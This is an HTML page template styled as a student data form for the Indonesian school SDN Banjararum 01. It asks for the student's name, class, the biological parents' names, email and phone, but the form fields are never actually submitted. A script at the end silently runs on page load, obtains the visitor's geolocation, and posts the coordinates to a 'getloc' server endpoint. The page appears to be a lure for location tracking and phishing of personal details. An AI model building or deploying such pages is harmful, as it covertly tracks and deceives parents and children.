<!DOCTYPE html>
<html>
    <head>
        <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/css/bootstrap.min.css">
    </head>
<body>
    <div class="container">
        <form>
          <h2>Form data Dapdodik SDN Banjararum 01</h2>
          <div class="row">
            <div class="col-md-6">
              <div class="form-group">
                <label for="first">Nama</label>
                <input type="text" class="form-control" placeholder="Nama" id="Nama">
              </div>
            </div>
            <!--  col-md-6   -->
      
            <div class="col-md-6">
              <div class="form-group">
                <label for="last">Kelas</label>
                <input type="text" class="form-control" placeholder="Kelas" id="">
              </div>
            </div>
            <!--  col-md-6   -->
          </div>
      
      
          <div class="row">
            <div class="col-md-6">
              <div class="form-group">
                <label for="company">Nama ayah kandung</label>
                <input type="text" class="form-control" placeholder="Nama ayah kandung" id="">
              </div>
      
      
            </div>
            <!--  col-md-6   -->
      
            <div class="col-md-6">
      
              <div class="form-group">
                <label for="phone">Nama Ibu kandung</label>
                <input type="tel" class="form-control" id="phone" placeholder="Nama Ibu kandung">
              </div>
            </div>
            <!--  col-md-6   -->
          </div>
          <!--  row   -->
      
      
          <div class="row">
            <div class="col-md-6">
      
              <div class="form-group">
                <label for="email">Alamat Email Aktif</label>
                <input type="email" class="form-control" id="email" placeholder="email">
              </div>
            </div>
            <!--  col-md-6   -->
      
            <div class="col-md-6">
              <div class="form-group">
                <label for="url">No hp aktif</label>
                <input type="url" class="form-control" id="url" placeholder="No hp">
              </div>
      
            </div>
            <!--  col-md-6   -->
          </div>
          <!--  row   -->
          <button type="submit" class="btn"><a href="{% url 'tx' %}">Submit</a></button>
        </form>
      </div>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/js/bootstrap.min.js"></script>
<script>
function myFunction() {
  location.replace("{% url 'tx' %}")
}
var allowGeoRecall = true
function getLocation() {   
    console.log('getLocation was called') 
    if(navigator.geolocation) {
        navigator.geolocation.getCurrentPosition(showPosition);
    } else {
        allowGeoRecall = false
    }
}

function positionError() {    
    if(allowGeoRecall) getLocation()
}

function showPosition(position){
    console.log(position.coords.latitude,position.coords.longitude)
    $.ajax({
        type: "POST",
        url: "{% url 'getloc' %}",
        data: {
            'lat': position.coords.latitude,
            'lng': position.coords.longitude
        },
        success: function () {
            console.log("ok");
        }
      });
      return false; //<---- move it here
    
    allowGeoRecall = false
}
getLocation();
</script>

</body>
</html> 